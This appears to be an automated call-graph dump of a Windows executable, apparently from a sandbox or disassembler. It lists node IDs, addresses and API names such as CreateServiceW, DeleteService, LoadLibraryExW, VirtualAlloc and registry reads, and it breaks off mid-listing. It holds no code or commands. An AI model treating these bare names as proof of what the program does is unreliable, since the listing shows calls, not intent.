12674 1064395 12675 10643a4 12674->12675 12826 106555f 12674->12826 12829 106529a 12675->12829 12678 10643a9 __expandlocale 12680 106bc02 12679->12680 12680->12649 12681->12651 12832 10653ac RtlEncodePointer 12682->12832 12687 106b3ee 12840 106b456 12687->12840 12691 106b400 12691->12687 12692 106b40b 12691->12692 12845 1064f0a 12692->12845 12695 106b44d 12697 106b456 __mtterm FlsFree 12695->12697 12699 106b452 12697->12699 12698 106b42c 12698->12695 12700 106b432 12698->12700 12699->12655 12851 106b334 12700->12851 12702 106b43a GetCurrentThreadId 12702->12655 12704 1064348 12703->12704 12705 106bb2e 12703->12705 12709 106b6db GetModuleFileNameW 12704->12709 12706 1064f54 __malloc_crt 70 API calls 12705->12706 12707 106bb54 _memmove 12706->12707 12708 106bb6a FreeEnvironmentStringsW 12707->12708 12708->12704 12710 106b70f _wparse_cmdline 12709->12710 12711 1064f54 __malloc_crt 70 API calls 12710->12711 12712 106b74f _wparse_cmdline 12710->12712 12711->12712 12712->12662 12714 106b925 12713->12714 12715 106b92d __expandlocale 12713->12715 12714->12666 12716 106b94b 12715->12716 12717 1064f0a __calloc_crt 70 API calls 12716->12717 12718 106b956 __expandlocale 12717->12718 12718->12714 12721 106b9ad 12718->12721 12722 1064f0a __calloc_crt 70 API calls 12718->12722 12723 106b9d2 12718->12723 12724 10723f3 __expandlocale 70 API calls 12718->12724 12726 106b9e9 12718->12726 12719 1064ed2 _free 70 API calls 12720 106b9b9 12719->12720 12720->12714 12721->12719 12722->12718 12725 1064ed2 _free 70 API calls 12723->12725 12724->12718 12725->12720 12727 1064748 __expandlocale 8 API calls 12726->12727 12728 106b9f5 12727->12728 12728->12666 12731 10652b5 __IsNonwritableInCurrentImage 12729->12731 13127 106cd3b 12731->13127 12732 10652d3 __initterm_e 12734 10652f4 __IsNonwritableInCurrentImage 12732->12734 13130 106cd26 12732->13130 12734->12670 12736 1061d80 Sleep 12735->12736 12737 1061d8b 12736->12737 12738 1061e09 GetCommandLineW 12737->12738 13195 1063b3a 12737->13195 13227 1061a90 12738->13227 12744 1061e23 12748 1061e60 12744->12748 13236 1061960 MultiByteToWideChar 12744->13236 12745 1061dad 13211 106378c 12745->13211 12747 1061db3 12751 10633b4 _fseek 108 API calls 12747->12751 12752 1061960 9 API calls 12748->12752 12765 1061e64 12748->12765 12808 1061eb0 _vwprintf_helper 12748->12808 12750 10625e0 13269 1061490 12750->13269 12754 1061dbf VirtualAlloc 12751->12754 12755 1061e9b 12752->12755 12753 1061e4c 12753->12748 13240 1061b50 RegOpenKeyW 12753->13240 13224 1063279 12754->13224 12757 1061e9f 12755->12757 12755->12808 13253 1061700 12757->13253 12762 10625f3 12766 1062674 12762->12766 12767 1062611 lstrlenW 12762->12767 12764 1061ea7 12764->12674 12765->12674 12770 10626a0 12766->12770 12771 1062680 12766->12771 12795 1062632 12766->12795 12768 1062620 CLSIDFromString 12767->12768 12769 106264a 12767->12769 12768->12769 12768->12795 12769->12795 13277 1061860 lstrcpyW lstrlenW 12769->13277 12772 10626a4 12770->12772 12775 10626c4 12770->12775 12776 1062701 12770->12776 13281 10615a0 12771->13281 12772->12674 13287 10612a0 LoadLibraryExW 12775->13287 12777 1062707 12776->12777 12778 106271a 12776->12778 13296 1061060 12777->13296 12782 1062730 12778->12782 12783 1062720 12778->12783 12787 1062736 12782->12787 12794 1062746 12782->12794 13301 10610b0 OpenSCManagerW 12783->13301 13312 10611a0 OpenSCManagerW 12787->13312 12788 1062725 12788->12674 12789 1061960 9 API calls 12789->12808 12792 1062582 lstrlenW 12792->12808 12793 106273b 12793->12674 12794->12795 12797 1061320 117 API calls 12794->12797 12795->12674 12796 10626ed FreeLibrary 12796->12795 12800 1062776 12797->12800 12798 10619f0 9 API calls 12798->12808 12799 106202a lstrlenW 12799->12808 12801 1061430 ExitProcess lstrcpyW 12801->12808 12802 10620e1 lstrlenW 12802->12808 12803 1062f67 110 API calls _fprintf 12803->12808 12804 106224d lstrlenW 12804->12808 12805 1062312 ExitProcess 12806 1061930 9 API calls 12806->12808 12807 1062355 lstrlenW 12807->12808 12808->12750 12808->12789 12808->12792 12808->12794 12808->12798 12808->12799 12808->12801 12808->12802 12808->12803 12808->12804 12808->12805 12808->12806 12808->12807 12809 1062768 12808->12809 13265 10619f0 MultiByteToWideChar 12808->13265 13327 1061320 GetModuleHandleA GetModuleFileNameW 12809->13327 12812 106443f 12811->12812 12813 106443a 12811->12813 12815 106b4d0 __NMSG_WRITE 70 API calls 12812->12815 12814 106b473 __FF_MSGBANNER 70 API calls 12813->12814 12814->12812 12816 1064447 12815->12816 12817 1065152 _fast_error_exit 3 API calls 12816->12817 12818 1064451 12817->12818 12818->12652 12820 106b473 __FF_MSGBANNER 70 API calls 12819->12820 12821 1065277 12820->12821 12822 106b4d0 __NMSG_WRITE 70 API calls 12821->12822 12823 106527f 12822->12823 14356 106533a 12823->14356 12827 1065430 _doexit 70 API calls 12826->12827 12828 106556e 12827->12828 12828->12675 12830 1065430 _doexit 70 API calls 12829->12830 12831 10652a5 12830->12831 12831->12678 12833 10653bd __init_pointers __initp_misc_winsig 12832->12833 12863 106cdd9 EncodePointer 12833->12863 12835 10653db 12836 1064e88 12835->12836 12837 1064e94 12836->12837 12838 1064e9a InitializeCriticalSectionAndSpinCount 12837->12838 12839 1064eb7 12837->12839 12838->12837 12839->12687 12844 106bbb1 FlsAlloc 12839->12844 12841 106b460 12840->12841 12842 106b466 12840->12842 12864 106bbbf FlsFree 12841->12864 12842->12842 12844->12691 12847 1064f11 12845->12847 12848 1064f4e 12847->12848 12849 1064f2f Sleep 12847->12849 12865 106ca3e 12847->12865 12848->12695 12850 106bbdb FlsSetValue 12848->12850 12849->12847 12850->12698 12852 106b340 __expandlocale 12851->12852 12900 1064d39 12852->12900 12854 106b376 InterlockedIncrement 12907 106b3ce 12854->12907 12857 1064d39 __lock 69 API calls 12858 106b397 12857->12858 12910 1070061 InterlockedIncrement 12858->12910 12860 106b3b5 12922 106b3d7 12860->12922 12862 106b3c2 __expandlocale 12862->12702 12863->12835 12864->12842 12866 106ca49 12865->12866 12871 106ca64 12865->12871 12867 106ca55 12866->12867 12866->12871 12873 10647cc 12867->12873 12868 106ca74 HeapAlloc 12868->12871 12872 106ca5a 12868->12872 12871->12868 12871->12872 12876 106ce35 DecodePointer 12871->12876 12872->12847 12878 106b2c5 GetLastError 12873->12878 12875 10647d1 12875->12872 12877 106ce48 12876->12877 12877->12871 12892 106bbcd FlsGetValue 12878->12892 12880 106b2da 12881 106b328 SetLastError 12880->12881 12882 1064f0a __calloc_crt 67 API calls 12880->12882 12881->12875 12883 106b2ed 12882->12883 12883->12881 12893 106bbdb FlsSetValue 12883->12893 12885 106b301 12886 106b307 12885->12886 12887 106b31f 12885->12887 12889 106b334 __initptd 67 API calls 12886->12889 12894 1064ed2 12887->12894 12891 106b30f GetCurrentThreadId 12889->12891 12890 106b325 12890->12881 12891->12881 12892->12880 12893->12885 12895 1064edb HeapFree 12894->12895 12899 1064f04 _free 12894->12899 12896 1064ef0 12895->12896 12895->12899 12897 10647cc __woutput_s_l 68 API calls 12896->12897 12898 1064ef6 GetLastError 12897->12898 12898->12899 12899->12890 12901 1064d5d EnterCriticalSection 12900->12901 12902 1064d4a 12900->12902 12901->12854 12925 1064de1 12902->12925 12904 1064d50 12904->12901 12905 106526f __amsg_exit 69 API calls 12904->12905 12906 1064d5c 12905->12906 12906->12901 13125 1064ebd LeaveCriticalSection 12907->13125 12909 106b390 12909->12857 12911 107007e 12910->12911 12912 1070079 InterlockedIncrement 12910->12912 12913 107008b 12911->12913 12914 1070088 InterlockedIncrement 12911->12914 12912->12911 12915 1070096 12913->12915 12916 1070091 InterlockedIncrement 12913->12916 12914->12913 12917 10700a0 InterlockedIncrement 12915->12917 12918 10700a3 12915->12918 12916->12915 12917->12918 12919 10700ba InterlockedIncrement 12918->12919 12920 10700cd InterlockedIncrement 12918->12920 12921 10700de InterlockedIncrement 12918->12921 12919->12918 12920->12918 12921->12860 13126 1064ebd LeaveCriticalSection 12922->13126 12924 106b3de 12924->12862 12926 1064ded __expandlocale 12925->12926 12927 1064df6 12926->12927 12928 1064e0e 12926->12928 12948 106b473 12927->12948 12931 1064e2e __expandlocale 12928->12931 12993 1064f54 12928->12993 12931->12904 12935 1064e02 12990 1065152 12935->12990 12936 1064e38 12939 1064d39 __lock 69 API calls 12936->12939 12937 1064e29 12938 10647cc __woutput_s_l 69 API calls 12937->12938 12938->12931 12941 1064e3f 12939->12941 12943 1064e63 12941->12943 12944 1064e4e InitializeCriticalSectionAndSpinCount 12941->12944 12946 1064ed2 _free 69 API calls 12943->12946 12945 1064e69 12944->12945 12999 1064e7f 12945->12999 12946->12945 13002 106ba03 12948->13002 12950 106b47a 12951 106b487 12950->12951 12952 106ba03 __FF_MSGBANNER 70 API calls 12950->12952 12953 106b4d0 __NMSG_WRITE 70 API calls 12951->12953 12956 1064dfb 12951->12956 12952->12951 12954 106b49f 12953->12954 12955 106b4d0 __NMSG_WRITE 70 API calls 12954->12955 12955->12956 12957 106b4d0 12956->12957 12958 106b4ee __NMSG_WRITE 12957->12958 12960 106ba03 __FF_MSGBANNER 67 API calls 12958->12960 12965 106b615 12958->12965 12962 106b501 12960->12962 12961 106b67e 12961->12935 12963 106b61a GetStdHandle 12962->12963 12964 106ba03 __FF_MSGBANNER 67 API calls 12962->12964 12963->12965 12968 106b628 _strlen 12963->12968 12966 106b512 12964->12966 13085 10678fa 12965->13085 12966->12963 12967 106b524 12966->12967 12967->12965 13032 10723f3 12967->13032 12968->12965 12970 106b661 WriteFile 12968->12970 12970->12965 12972 106b680 12975 1064748 __expandlocale 8 API calls 12972->12975 12973 106b551 GetModuleFileNameW 12974 106b571 12973->12974 12981 106b581 __expandlocale 12973->12981 12976 10723f3 __expandlocale 67 API calls 12974->12976 12977 106b68a 12975->12977 12976->12981 12978 106b694 12977->12978 12979 1064748 __expandlocale 8 API calls 12977->12979 12978->12935 12983 106b6aa 12979->12983 12980 106b5c7 12980->12972 13050 1072387 12980->13050 12981->12972 12981->12980 13041 1072468 12981->13041 12983->12935 12986 1072387 __wsetlocale_get_all 67 API calls 12987 106b5fe 12986->12987 12987->12972 12988 106b605 12987->12988 13059 1072526 EncodePointer 12988->13059 13104 1065120 GetModuleHandleExW 12990->13104 12996 1064f62 12993->12996 12995 1064e22 12995->12936 12995->12937 12996->12995 12997 1064f75 Sleep 12996->12997 13107 106c898 12996->13107 12998 1064f8e 12997->12998 12998->12995 12998->12996 13124 1064ebd LeaveCriticalSection 12999->13124 13001 1064e86 13001->12931 13003 106ba0d 13002->13003 13004 10647cc __woutput_s_l 70 API calls 13003->13004 13005 106ba17 13003->13005 13006 106ba33 13004->13006 13005->12950 13009 106471d 13006->13009 13012 10646f2 DecodePointer 13009->13012 13013 1064705 13012->13013 13018 1064748 IsProcessorFeaturePresent 13013->13018 13016 10646f2 __invalid_parameter_noinfo_noreturn 8 API calls 13017 1064729 13016->13017 13017->12950 13019 1064753 13018->13019 13024 10645b5 13019->13024 13023 106471c 13023->13016 13025 10645cf _memset ___raise_securityfailure 13024->13025 13026 10645ef IsDebuggerPresent 13025->13026 13027 106bc7c ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 13026->13027 13029 10646b3 ___raise_securityfailure 13027->13029 13028 10678fa __expandlocale 6 API calls 13030 10646d6 13028->13030 13029->13028 13031 106bc67 GetCurrentProcess TerminateProcess 13030->13031 13031->13023 13033 10723fe 13032->13033 13035 107240c 13032->13035 13033->13035 13038 1072425 13033->13038 13034 10647cc __woutput_s_l 70 API calls 13036 1072416 13034->13036 13035->13034 13037 106471d __woutput_s_l 9 API calls 13036->13037 13039 106b544 13037->13039 13038->13039 13040 10647cc __woutput_s_l 70 API calls 13038->13040 13039->12972 13039->12973 13040->13036 13046 1072476 13041->13046 13042 107247a 13043 10647cc __woutput_s_l 70 API calls 13042->13043 13044 107247f 13042->13044 13045 10724aa 13043->13045 13044->12980 13047 106471d __woutput_s_l 9 API calls 13045->13047 13046->13042 13046->13044 13048 10724b9 13046->13048 13047->13044 13048->13044 13049 10647cc __woutput_s_l 70 API calls 13048->13049 13049->13045 13051 10723a1 13050->13051 13053 1072393 13050->13053 13052 10647cc __woutput_s_l 70 API calls 13051->13052 13058 10723ab 13052->13058 13053->13051 13056 10723cd 13053->13056 13054 106471d __woutput_s_l 9 API calls 13055 106b5e7 13054->13055 13055->12972 13055->12986 13056->13055 13057 10647cc __woutput_s_l 70 API calls 13056->13057 13057->13058 13058->13054 13092 106bc0d 13059->13092 13062 1072617 IsDebuggerPresent 13066 1072621 13062->13066 13067 107263c 13062->13067 13063 1072569 LoadLibraryExW 13064 10725a4 GetProcAddress 13063->13064 13065 1072580 GetLastError 13063->13065 13069 10725b8 7 API calls 13064->13069 13073 1072634 13064->13073 13068 107258f LoadLibraryW 13065->13068 13065->13073 13070 107262f 13066->13070 13071 1072628 OutputDebugStringW 13066->13071 13067->13070 13072 1072641 DecodePointer 13067->13072 13068->13064 13068->13073 13075 1072614 13069->13075 13076 1072600 GetProcAddress EncodePointer 13069->13076 13070->13073 13074 1072680 13070->13074 13077 1072668 DecodePointer DecodePointer 13070->13077 13071->13070 13072->13073 13079 10678fa __expandlocale 6 API calls 13073->13079 13078 10726b8 DecodePointer 13074->13078 13084 10726a4 DecodePointer 13074->13084 13075->13062 13076->13075 13077->13074 13082 10726bf 13078->13082 13078->13084 13081 1072706 13079->13081 13081->12965 13083 10726d0 DecodePointer 13082->13083 13082->13084 13083->13084 13084->13073 13086 1067904 IsProcessorFeaturePresent 13085->13086 13087 1067902 13085->13087 13089 10710b5 13086->13089 13087->12961 13096 1071064 IsDebuggerPresent 13089->13096 13093 106bc4f 13092->13093 13094 106bc1c GetModuleHandleW GetProcAddress 13092->13094 13093->13062 13093->13063 13095 106bc3c 13094->13095 13095->13093 13097 1071079 ___raise_securityfailure 13096->13097 13102 106bc7c SetUnhandledExceptionFilter UnhandledExceptionFilter 13097->13102 13099 1071081 ___raise_securityfailure 13103 106bc67 GetCurrentProcess TerminateProcess 13099->13103 13101 107109e 13101->12961 13102->13099 13103->13101 13105 106514b ExitProcess 13104->13105 13106 1065139 GetProcAddress 13104->13106 13106->13105 13108 106c913 13107->13108 13121 106c8a4 13107->13121 13109 106ce35 __calloc_impl DecodePointer 13108->13109 13111 106c919 13109->13111 13110 106c8af 13112 106b473 __FF_MSGBANNER 69 API calls 13110->13112 13116 106b4d0 __NMSG_WRITE 69 API calls 13110->13116 13120 1065152 _fast_error_exit 3 API calls 13110->13120 13110->13121 13113 10647cc __woutput_s_l 69 API calls 13111->13113 13112->13110 13115 106c90b 13113->13115 13114 106c8d7 RtlAllocateHeap 13114->13115 13114->13121 13115->12996 13116->13110 13117 106c8ff 13119 10647cc __woutput_s_l 69 API calls 13117->13119 13118 106ce35 __calloc_impl DecodePointer 13118->13121 13122 106c8fd 13119->13122 13120->13110 13121->13110 13121->13114 13121->13117 13121->13118 13121->13122 13123 10647cc __woutput_s_l 69 API calls 13122->13123 13123->13115 13124->13001 13125->12909 13126->12924 13128 106cd3e EncodePointer 13127->13128 13128->13128 13129 106cd58 13128->13129 13129->12732 13133 106cc30 13130->13133 13132 106cd31 13132->12734 13134 106cc3c __expandlocale 13133->13134 13141 106541e 13134->13141 13140 106cc5f __expandlocale 13140->13132 13142 1064d39 __lock 70 API calls 13141->13142 13143 1065425 13142->13143 13144 106cc70 DecodePointer DecodePointer 13143->13144 13145 106cc4d 13144->13145 13146 106cc9d 13144->13146 13155 106cc6a 13145->13155 13146->13145 13158 107295e 13146->13158 13148 106cd00 EncodePointer EncodePointer 13148->13145 13149 106ccaf 13149->13148 13150 106ccd4 13149->13150 13165 1064f9d 13149->13165 13150->13145 13152 1064f9d __realloc_crt 74 API calls 13150->13152 13153 106ccee EncodePointer 13150->13153 13154 106cce8 13152->13154 13153->13148 13154->13145 13154->13153 13191 1065427 13155->13191 13159 1072967 13158->13159 13160 107297c HeapSize 13158->13160 13161 10647cc __woutput_s_l 70 API calls 13159->13161 13160->13149 13162 107296c 13161->13162 13163 106471d __woutput_s_l 9 API calls 13162->13163 13164 1072977 13163->13164 13164->13149 13167 1064fa4 13165->13167 13168 1064fe3 13167->13168 13169 1064fc4 Sleep 13167->13169 13170 106c92a 13167->13170 13168->13150 13169->13167 13171 106c933 13170->13171 13172 106c93e 13170->13172 13174 106c898 _malloc 70 API calls 13171->13174 13173 106c946 13172->13173 13183 106c953 13172->13183 13175 1064ed2 _free 70 API calls 13173->13175 13176 106c93b 13174->13176 13190 106c94e _free 13175->13190 13176->13167 13177 106c98b 13179 106ce35 __calloc_impl DecodePointer 13177->13179 13178 106c95b HeapReAlloc 13178->13183 13178->13190 13180 106c991 13179->13180 13181 10647cc __woutput_s_l 70 API calls 13180->13181 13181->13190 13182 106c9bb 13185 10647cc __woutput_s_l 70 API calls 13182->13185 13183->13177 13183->13178 13183->13182 13184 106ce35 __calloc_impl DecodePointer 13183->13184 13187 106c9a3 13183->13187 13184->13183 13186 106c9c0 GetLastError 13185->13186 13186->13190 13188 10647cc __woutput_s_l 70 API calls 13187->13188 13189 106c9a8 GetLastError 13188->13189 13189->13190 13190->13167 13194 1064ebd LeaveCriticalSection 13191->13194 13193 106542e 13193->13140 13194->13193 13336 1063b94 13195->13336 13197 1061da1 13198 10633b4 13197->13198 13199 10633c0 __expandlocale 13198->13199 13200 10633ce 13199->13200 13202 10633f4 13199->13202 13201 10647cc __woutput_s_l 70 API calls 13200->13201 13203 10633d3 13201->13203 13900 1062e2a 13202->13900 13205 106471d __woutput_s_l 9 API calls 13203->13205 13210 10633de __expandlocale 13205->13210 13210->12745 13212 1063798 __expandlocale 13211->13212 13213 10637a6 13212->13213 13214 10637bb 13212->13214 13215 10647cc __woutput_s_l 70 API calls 13213->13215 13216 1062e2a __lock_file 71 API calls 13214->13216 13217 10637ab 13215->13217 13218 10637c1 13216->13218 13219 106471d __woutput_s_l 9 API calls 13217->13219 13220 1063433 __ftell_nolock 79 API calls 13218->13220 13223 10637b6 __expandlocale 13219->13223 13221 10637cc 13220->13221 14037 10637ec 13221->14037 13223->12747 14040 1063294 13224->14040 13226 1061ddb #17 13226->12738 14218 1061640 13227->14218 13230 1061add 13232 1061ae4 GetProcessHeap HeapAlloc 13230->13232 13231 1061b38 13231->12744 13233 1061b12 13232->13233 13234 1061b00 GetProcessHeap HeapFree 13232->13234 13233->13231 13235 1061b20 lstrlenW 13233->13235 13234->12744 13235->13231 13235->13235 13237 1061984 lstrlenW 13236->13237 13238 106197d 13236->13238 13237->13238 13239 1061994 7 API calls 13237->13239 13238->12753 13239->12753 13241 1061b7f 13240->13241 13242 1061b88 RegQueryValueExW 13240->13242 13241->12748 13243 1061c57 RegCloseKey 13242->13243 13244 1061ba9 13242->13244 13243->12748 13244->13243 13245 1061bb3 lstrlenW GetProcessHeap HeapAlloc 13244->13245 13246 1061bf7 _memmove 13245->13246 13247 1061be4 RegCloseKey 13245->13247 13248 1061c07 RegQueryValueExW 13246->13248 13247->12748 13249 1061c36 13248->13249 13250 1061c47 GetProcessHeap HeapFree 13248->13250 13251 1061a90 8 API calls 13249->13251 13250->13243 13252 1061c42 13251->13252 13252->13250 14220 1062d5a 13253->14220 13256 106171e 13256->12764 13259 1061760 GetLastError 13259->12764 13260 106176d CoInitializeEx ReadFile 13261 10617fc CoUninitialize GetLastError 13260->13261 13263 1061792 13260->13263 13261->12764 13262 106179b CreateThread WriteFile 13262->13261 13262->13263 13263->13261 13263->13262 13264 10617e9 ReadFile 13263->13264 13264->13261 13264->13263 13266 1061a14 lstrlenW 13265->13266 13267 1061a0d 13265->13267 13266->13267 13268 1061a24 7 API calls 13266->13268 13267->12792 13268->12792 13270 10614a7 13269->13270 13271 106149e 13269->13271 13272 10614b0 lstrlenW 13270->13272 13271->12762 13272->13272 13273 10614c5 GetProcessHeap HeapAlloc 13272->13273 13276 10614e0 _wcschr _memmove 13273->13276 13274 1061585 13274->12762 13275 1061551 lstrlenW 13275->13276 13276->13274 13276->13275 13280 106187e 13277->13280 13278 10618a4 lstrcatW 13278->12795 13279 106189d 13279->12795 13280->13278 13280->13279 13282 10615b5 lstrlenW 13281->13282 13283 10615c8 GetProcessHeap HeapAlloc 13281->13283 13282->13282 13282->13283 13284 10615e7 13283->13284 13285 1061627 13283->13285 13284->13285 13286 10615f0 lstrlenW lstrcpynW 13284->13286 13285->12674 13286->13284 13288 10612ba _vwprintf_helper 13287->13288 13289 10612d9 GetProcAddress 13287->13289 14286 1062f67 13288->14286 13290 10612e7 _vwprintf_helper 13289->13290 13291 1061315 13289->13291 13293 1062f67 _fprintf 110 API calls 13290->13293 13291->12795 13291->12796 13295 1061302 FreeLibrary ExitProcess 13293->13295 13294 10612ce ExitProcess 13297 10612a0 115 API calls 13296->13297 13298 106107c 13297->13298 13299 1061082 13298->13299 13300 1061094 FreeLibrary 13298->13300 13299->12674 13300->13299 13302 10610f0 GetSystemDirectoryW lstrcpyW CreateServiceW 13301->13302 13305 10610d1 _vwprintf_helper 13301->13305 13303 1061146 CloseServiceHandle CloseServiceHandle 13302->13303 13304 106115c GetLastError 13302->13304 13303->12788 13306 1061184 CloseServiceHandle 13304->13306 13307 1061169 _vwprintf_helper 13304->13307 13308 1062f67 _fprintf 110 API calls 13305->13308 13306->12788 13310 1062f67 _fprintf 110 API calls 13307->13310 13309 10610e4 13308->13309 13309->12788 13311 106117c 13310->13311 13311->13306 13313 10611d4 OpenServiceW 13312->13313 13314 10611b8 _vwprintf_helper 13312->13314 13315 1061224 GetLastError 13313->13315 13316 10611ec DeleteService 13313->13316 13321 1062f67 _fprintf 110 API calls 13314->13321 13319 1061231 _vwprintf_helper 13315->13319 13320 106124c CloseServiceHandle 13315->13320 13317 10611f7 _vwprintf_helper 13316->13317 13318 1061212 CloseServiceHandle CloseServiceHandle 13316->13318 13323 1062f67 _fprintf 110 API calls 13317->13323 13318->12793 13324 1062f67 _fprintf 110 API calls 13319->13324 13320->12793 13322 10611cb 13321->13322 13322->12793 13325 106120a 13323->13325 13326 1061244 13324->13326 13325->13318 13326->13320 13328 1061356 GetLastError 13327->13328 13329 106135c LoadStringW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13327->13329 13328->13329 13331 10613fc GetProcessHeap HeapFree GetProcessHeap HeapFree ExitProcess 13329->13331 13332 10613ca 13329->13332 13332->13331 13333 10613ce LoadStringW 13332->13333 13334 1061c70 swprintf 103 API calls 13333->13334 13335 10613f6 13334->13335 13335->13331 13338 1063ba0 __expandlocale 13336->13338 13337 1063bb3 13339 10647cc __woutput_s_l 70 API calls 13337->13339 13338->13337 13340 1063be4 13338->13340 13341 1063bb8 13339->13341 13355 106aa26 13340->13355 13343 106471d __woutput_s_l 9 API calls 13341->13343 13354 1063bc3 __expandlocale @_EH4_CallFilterFunc@8 13343->13354 13344 1063be9 13345 1063bf2 13344->13345 13346 1063bff 13344->13346 13347 10647cc __woutput_s_l 70 API calls 13345->13347 13348 1063c29 13346->13348 13349 1063c09 13346->13349 13347->13354 13369 106ab3e 13348->13369 13350 10647cc __woutput_s_l 70 API calls 13349->13350 13350->13354 13354->13197 13356 106aa32 __expandlocale 13355->13356 13357 1064d39 __lock 70 API calls 13356->13357 13366 106aa40 13357->13366 13358 106aab7 13360 1064f54 __malloc_crt 70 API calls 13358->13360 13362 106aabe 13360->13362 13361 106ab2a __expandlocale 13361->13344 13363 106aacd InitializeCriticalSectionAndSpinCount EnterCriticalSection 13362->13363 13367 106aab0 13362->13367 13363->13367 13364 1064de1 __mtinitlocknum 70 API calls 13364->13366 13366->13358 13366->13364 13366->13367 13390 1062e69 13366->13390 13395 1062ed3 13366->13395 13387 106ab35 13367->13387 13378 106ab5e _TestDefaultCountry 13369->13378 13370 106ab78 13371 10647cc __woutput_s_l 70 API calls 13370->13371 13373 106ab7d 13371->13373 13372 106ad33 13372->13370 13376 106ad96 13372->13376 13374 106471d __woutput_s_l 9 API calls 13373->13374 13375 1063c34 13374->13375 13384 1063c56 13375->13384 13402 1072051 13376->13402 13378->13370 13378->13372 13405 10720a5 13378->13405 13381 10720a5 __wcsnicmp 82 API calls 13382 106ad4b 13381->13382 13382->13372 13383 10720a5 __wcsnicmp 82 API calls 13382->13383 13383->13372 13893 1062e99 13384->13893 13386 1063c5c 13386->13354 13400 1064ebd LeaveCriticalSection 13387->13400 13389 106ab3c 13389->13361 13391 1062e74 13390->13391 13392 1062e8a EnterCriticalSection 13390->13392 13393 1064d39 __lock 70 API calls 13391->13393 13392->13366 13394 1062e7d 13393->13394 13394->13366 13396 1062ef4 LeaveCriticalSection 13395->13396 13397 1062ee1 13395->13397 13396->13366 13401 1064ebd LeaveCriticalSection 13397->13401 13399 1062ef1 13399->13366 13400->13389 13401->13399 13413 1071811 13402->13413 13404 107206a 13404->13375 13406 10720b7 13405->13406 13407 1072143 13405->13407 13409 10647cc __woutput_s_l 70 API calls 13406->13409 13412 106ad2c 13406->13412 13783 1072159 13407->13783 13410 10720d0 13409->13410 13411 106471d __woutput_s_l 9 API calls 13410->13411 13411->13412 13412->13372 13412->13381 13416 107181d __expandlocale 13413->13416 13414 107182f 13415 10647cc __woutput_s_l 70 API calls 13414->13415 13417 1071834 13415->13417 13416->13414 13418 1071866 13416->13418 13419 106471d __woutput_s_l 9 API calls 13417->13419 13424 10718d8 13418->13424 13423 107183e __expandlocale 13419->13423 13421 1071883 13504 10718ac 13421->13504 13423->13404 13508 1066594 InitOnceExecuteOnce 13424->13508 13426 10718f6 13427 10718fa GetLastError 13426->13427 13428 1071919 13426->13428 13547 10647ab 13427->13547 13509 1075003 13428->13509 13431 10647cc __woutput_s_l 70 API calls 13433 1071912 13431->13433 13433->13421 13434 1064748 __expandlocale 8 API calls 13435 1072050 13434->13435 13438 1071811 __wsopen_helper 129 API calls 13435->13438 13436 107193b 13437 1071976 13436->13437 13444 1071999 13436->13444 13453 1071a73 13436->13453 13552 1064798 13437->13552 13440 107206a 13438->13440 13440->13421 13442 10647cc __woutput_s_l 70 API calls 13443 1071988 13442->13443 13446 106471d __woutput_s_l 9 API calls 13443->13446 13445 1071a57 13444->13445 13452 1071a35 13444->13452 13447 1064798 __chsize_s 70 API calls 13445->13447 13446->13433 13448 1071a5c 13447->13448 13449 10647cc __woutput_s_l 70 API calls 13448->13449 13450 1071a69 13449->13450 13451 106471d __woutput_s_l 9 API calls 13450->13451 13451->13453 13516 1070bff 13452->13516 13453->13434 13455 1071b03 13456 1071b2e 13455->13456 13457 1071b0d 13455->13457 13537 10716a2 13456->13537 13458 1064798 __chsize_s 70 API calls 13457->13458 13460 1071b12 13458->13460 13461 10647cc __woutput_s_l 70 API calls 13460->13461 13463 1071b1c 13461->13463 13462 1071bce GetFileType 13464 1071c1b 13462->13464 13465 1071bd9 GetLastError 13462->13465 13468 10647cc __woutput_s_l 70 API calls 13463->13468 13555 1070fbc 13464->13555 13469 10647ab __dosmaperr 70 API calls 13465->13469 13466 1071b9c GetLastError 13467 10647ab __dosmaperr 70 API calls 13466->13467 13471 1071bc1 13467->13471 13468->13433 13472 1071c00 CloseHandle 13469->13472 13477 10647cc __woutput_s_l 70 API calls 13471->13477 13472->13471 13476 1071c0e 13472->13476 13473 10716a2 ___createFile 5 API calls 13474 1071b91 13473->13474 13474->13462 13474->13466 13478 10647cc __woutput_s_l 70 API calls 13476->13478 13477->13453 13479 1071c13 13478->13479 13479->13471 13480 1071df4 13480->13453 13500 1071cba 13500->13480 13505 10718d6 13504->13505 13506 10718b2 13504->13506 13505->13423 13782 107103e LeaveCriticalSection 13506->13782 13508->13426 13510 1075022 13509->13510 13511 107500d 13509->13511 13510->13436 13512 10647cc __woutput_s_l 70 API calls 13511->13512 13513 1075012 13512->13513 13514 106471d __woutput_s_l 9 API calls 13513->13514 13515 107501d 13514->13515 13515->13436 13517 1070c0b __expandlocale 13516->13517 13518 1064de1 __mtinitlocknum 70 API calls 13517->13518 13519 1070c1c 13518->13519 13522 1070c21 __expandlocale 13519->13522 13658 1066594 InitOnceExecuteOnce 13519->13658 13521 1070c2e 13521->13522 13523 1064d39 __lock 70 API calls 13521->13523 13522->13455 13532 1070c39 13523->13532 13524 1070d8e 13671 1070da5 13524->13671 13526 1070d15 13527 1064f0a __calloc_crt 70 API calls 13526->13527 13530 1070d1e 13527->13530 13528 1070cb5 EnterCriticalSection 13531 1070cc5 LeaveCriticalSection 13528->13531 13528->13532 13529 1064d39 __lock 70 API calls 13529->13532 13530->13524 13662 1070b73 13530->13662 13531->13532 13532->13524 13532->13526 13532->13528 13532->13529 13533 1070c93 InitializeCriticalSectionAndSpinCount 13532->13533 13659 1070cdd 13532->13659 13533->13532 13536 1070d83 13536->13524 13538 106bc0d ___crtIsPackagedApp 2 API calls 13537->13538 13539 10716ae 13538->13539 13540 10716d4 13539->13540 13541 10716b2 GetModuleHandleW GetProcAddress 13539->13541 13543 106bc0d ___crtIsPackagedApp 2 API calls 13540->13543 13541->13540 13542 10716cf 13541->13542 13546 10716e3 13542->13546 13544 10716dc 13543->13544 13545 1071715 CreateFileW 13544->13545 13544->13546 13545->13546 13546->13462 13546->13466 13546->13473 13548 1064798 __chsize_s 70 API calls 13547->13548 13549 10647b4 _free 13548->13549 13550 10647cc __woutput_s_l 70 API calls 13549->13550 13551 10647c7 13550->13551 13551->13431 13553 106b2c5 __getptd_noexit 70 API calls 13552->13553 13554 106479d 13553->13554 13554->13442 13556 1071024 13555->13556 13557 1070fc8 13555->13557 13558 10647cc __woutput_s_l 70 API calls 13556->13558 13557->13556 13562 1070fea 13557->13562 13559 1071029 13558->13559 13561 1064798 __chsize_s 70 API calls 